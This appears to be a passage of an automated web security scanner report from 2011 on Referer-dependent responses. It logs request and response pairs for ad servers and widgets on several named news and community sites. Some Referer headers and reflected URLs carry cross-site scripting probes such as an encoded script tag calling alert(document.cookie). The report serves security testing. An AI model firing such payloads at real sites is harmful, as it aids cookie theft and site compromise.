http://www.apture.com/js/apture.js
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.flickr.com/badge_code_v2.gne

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

18.1. http://ads.dailystar.com.lb/www/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.dailystar.com.lb
Path:	/www/delivery/afr.php

Request 1

Response 1

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=29485f2e357d39dee079a30ead6a0e41; expires=Tue, 24-Jan-2012 21:58:37 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1304

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<a href='http://ads.dailystar.com.lb/www/delivery/ck.php?oaparams=2__bannerid=409__zoneid=45__cb=68e7037d84__oadest=http%3A%2F%2Fwww.cineklik.com' target='_blank'><img src='http://ads.dailystar.com.lb/www/images/02303828ed18756d6534202f69102117.gif' width='728' height='90' alt='Cineklik.com :: a Klik away from Movies' title='Cineklik.com :: a Klik away from Movies' border='0' /></a><div id='beacon_68e7037d84' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://ads.dailystar.com.lb/www/delivery/lg.php?bannerid=409&campaignid=194&zoneid=45&loc=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&cb=68e7037d84' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>

Request 2

GET /www/delivery/afr.php?zoneid=45&cb=456 HTTP/1.1
Host: ads.dailystar.com.lb
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=438206fd36140dfe6aac05f81e2ba322; expires=Tue, 24-Jan-2012 21:58:58 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1082

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<a href='http://ads.dailystar.com.lb/www/delivery/ck.php?oaparams=2__bannerid=409__zoneid=45__cb=4fe95235dc__oadest=http%3A%2F%2Fwww.cineklik.com' target='_blank'><img src='http://ads.dailystar.com.lb/www/images/02303828ed18756d6534202f69102117.gif' width='728' height='90' alt='Cineklik.com :: a Klik away from Movies' title='Cineklik.com :: a Klik away from Movies' border='0' /></a><div id='beacon_4fe95235dc' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://ads.dailystar.com.lb/www/delivery/lg.php?bannerid=409&campaignid=194&zoneid=45&cb=4fe95235dc' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>

18.2. http://as1.whdh.com/pan/adjs.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as1.whdh.com
Path:	/pan/adjs.php

Request 1

GET /pan/adjs.php?n=589498189&what=zone:238&target=_parent&exclude=, HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906310538946; path=/
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Content-Length: 919
Connection: close
Content-Type: application/x-javascript

var phpadsbanner = '';

phpadsbanner += '<'+'a href=\'http://as1.whdh.com/pan/adclick.php?bannerid=1594&zoneid=238&source=&dest=http%3A%2F%2Fwhdhstore.hipcricket.com%2F\' target=\'_blank\' onMouseOver="self.status=\'Sign up today for Snow Day alerts\'; return true;" onMouseOut="self.status=\'\';return true;"><'+'img src=\'http://as1-cache.whdh.com/as-images/snow-day-alert-banner-bug.png\' width=\'234\' height=\'60\' alt=\'Sign up today for Snow Day alerts\' title=\'Sign up today for Snow Day alerts\' border=\'0\'><'+'/a><'+'div id="beacon_1594" style="position: absolute; left: 0px; top: 0px; visibility: hidden;"><'+'img src=\'http://as1.whdh.com/pan/adlog.php?bannerid=1594&clientid=1234&zoneid=238&source=&block=0&capping=0&cb=0e40a7afd8c1943a08cf5f5111f91d66\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\'><'+'/div>';

document.write(phpadsbanner);

Request 2

GET /pan/adjs.php?n=589498189&what=zone:238&target=_parent&exclude=, HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:32 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906312726447; path=/
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.3. http://as1.whdh.com/pan/adx.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as1.whdh.com
Path:	/pan/adx.js

Request 1

GET /pan/adx.js HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:29 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906309132609; path=/
Last-Modified: Tue, 05 Jun 2007 15:13:18 GMT
ETag: "2802dd-46-1f0fff80"
Accept-Ranges: bytes
Content-Length: 70
Connection: close
Content-Type: application/x-javascript

function phpads_deliverActiveX(content)
{
document.write(content);
}

Request 2

GET /pan/adx.js HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906310198222; path=/
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.4. http://as2.whdh.com/m/m.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as2.whdh.com
Path:	/m/m.php

Request 1

GET /m/m.php?pass=2&1295906066 HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 1

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:58:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php?pass=2&1295906066 HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.5. http://as2.whdh.com/m/m.php/1295906165143/m.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as2.whdh.com
Path:	/m/m.php/1295906165143/m.gif

Request 1

GET /m/m.php/1295906165143/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 1

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:58:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295906165143/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:33 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.6. http://as2.whdh.com/m/m.php/1295906189027/m.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as2.whdh.com
Path:	/m/m.php/1295906189027/m.gif

Request 1

GET /m/m.php/1295906189027/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 1

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:58:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295906189027/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 2

18.7. http://as2.whdh.com/m/m.php/1295906202010/m.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as2.whdh.com
Path:	/m/m.php/1295906202010/m.gif

Request 1

GET /m/m.php/1295906202010/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 1

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:58:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295906202010/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:35 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.8. http://as2.whdh.com/m/m.php/1295920516924/m.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as2.whdh.com
Path:	/m/m.php/1295920516924/m.gif

Request 1

GET /m/m.php/1295920516924/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www3.whdh.com/mobile/phoneforecast/settings.php/5bebc%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb51006e4a2e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c

Response 1

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:27:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295920516924/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:27:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.9. http://as2.whdh.com/m/m.php/1295920639137/m.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as2.whdh.com
Path:	/m/m.php/1295920639137/m.gif

Request 1

GET /m/m.php/1295920639137/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www3.whdh.com/mobile/phoneforecast/settings.php/5bebc%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb51006e4a2e
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c

Response 1

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:27:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
location: http://www1.whdh.com/images/cd.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /m/m.php/1295920639137/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:27:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Oct 2006 00:50:28 GMT
ETag: "2806e2-2b-645e3d00"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.10. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://community.parenthood.com
Path:	/kickapps/service/getWidgetSwf.kickAction

Request 1

Response 1

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 04:28:37 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=8278D530E5DF18EDAEA83D02F203E614; Path=/
Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1&widgetHost=kickapps.yuku.com&buildVersion=1.0.589
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 04:28:37 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

Request 2

GET /kickapps/service/getWidgetSwf.kickAction HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 04:28:59 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=25F6F0AD2E12E2EAF433B82F8EA5E590; Path=/
Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=&widgetHost=kickapps.yuku.com&buildVersion=1.0.589
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 04:28:59 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

18.11. http://www.apture.com/js/apture.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.apture.com
Path:	/js/apture.js

Request 1

Response 1

HTTP/1.0 200 OK
Expires: Mon, 24 Jan 2011 22:22:50 GMT
Last-Modified: Mon, 24 Jan 2011 22:22:50 GMT
Etag: "fe64353a9a49f053ee471e7afdd40f25"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=pkZW6xftC5; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 1657
Date: Mon, 24 Jan 2011 22:22:50 GMT
Connection: close

(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22";A.visitId=199462424358761;A.abtests={};A.userCookieId=null;
A.siteToken="5rLcDWk";

A.brandingType=4;
A.capabilities=268;

A.getPage=function(){return apture.make("Page", {timestamp:1295903504.0,id:201236214,links:[],tmmLinks:[]});};
A.siteId=197235;
A.maxPageLinks=200;
A.platformName="WordpressOrg";
A.platformId=9;

A.barTitle="Star Scene";

A.barColor="#990000";
A.barTitleColor="#ffffff";

A.siteSearchUrl="http://starscene.dailystar.com.lb/";
A.shadowColor="#000000";

A.twitterHandle="StarSceneLB";

A.isApp=1;
//License terms: http://www.apture.com/license/
if(!B){ (function(s){var b=eval("(/*@cc_on!@*/0?(window.XMLHttpRequest/*@cc_on&&@_jscript_version>=5.7@*/?'ie7':null):(window.navigator.userAgent.toLowerCase().search(/iphone|ipad|android/)>-1)?null:(document.childNodes&&!document.all&&!navigator.taintEnabled)?'khtml':(document.getBoxObjectFor||(window.mozInnerScreenX===0||window.mozInnerScreenX))?'gecko':'unk')");if(b){s.type='text/javascript';s.charset='utf-8';s.src="http://cdn.apture.com/media/storage."+b+".js?v=21531601";s.defer='true';(document.getElementsByTagName("head").item(0)||document.body).appendChild(s)}})(document.createElement('script')) }
else if(A.initApp)A.initApp();

}else{var i = A.prefs;
if(i&&(i.created||i.editing))alert("This page has multiple Apture script tags in the HTML template. Please remove all but one of them.")
}})();

Request 2

GET /js/apture.js?siteToken=5rLcDWk HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.0 200 OK
Expires: Mon, 24 Jan 2011 22:22:51 GMT
Last-Modified: Mon, 24 Jan 2011 22:22:51 GMT
Etag: "f4dd6ce6d346fadfa75b7a6ff5f61fca"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=GGqoIIAaOx; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 1425
Date: Mon, 24 Jan 2011 22:22:51 GMT
Connection: close

(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="";A.visitId=69281105882904;A.abtests={};A.userCookieId=null;
A.siteToken="5rLcDWk";

A.brandingType=4;
A.capabilities=268;

A.getPage=function(){return apture.make("Page", {id:0});};
A.siteId=197235;
A.maxPageLinks=200;
A.platformName="WordpressOrg";
A.platformId=9;

A.barTitle="Star Scene";

A.barColor="#990000";
A.barTitleColor="#ffffff";

A.siteSearchUrl="http://starscene.dailystar.com.lb/";
A.shadowColor="#000000";

A.twitterHandle="StarSceneLB";

A.isApp=1;
//License terms: http://www.apture.com/license/
if(!B){ (function(s){var b=eval("(/*@cc_on!@*/0?(window.XMLHttpRequest/*@cc_on&&@_jscript_version>=5.7@*/?'ie7':null):(window.navigator.userAgent.toLowerCase().search(/iphone|ipad|android/)>-1)?null:(document.childNodes&&!document.all&&!navigator.taintEnabled)?'khtml':(document.getBoxObjectFor||(window.mozInnerScreenX===0||window.mozInnerScreenX))?'gecko':'unk')");if(b){s.type='text/javascript';s.charset='utf-8';s.src="http://cdn.apture.com/media/storage."+b+".js?v=21531601";s.defer='true';(document.getElementsByTagName("head").item(0)||document.body).appendChild(s)}})(document.createElement('script')) }
else if(A.initApp)A.initApp();

}else{var i = A.prefs;
if(i&&(i.created||i.editing))alert("This page has multiple Apture script tags in the HTML template. Please remove all but one of them.")
}})();

18.12. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Request 1

GET /extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
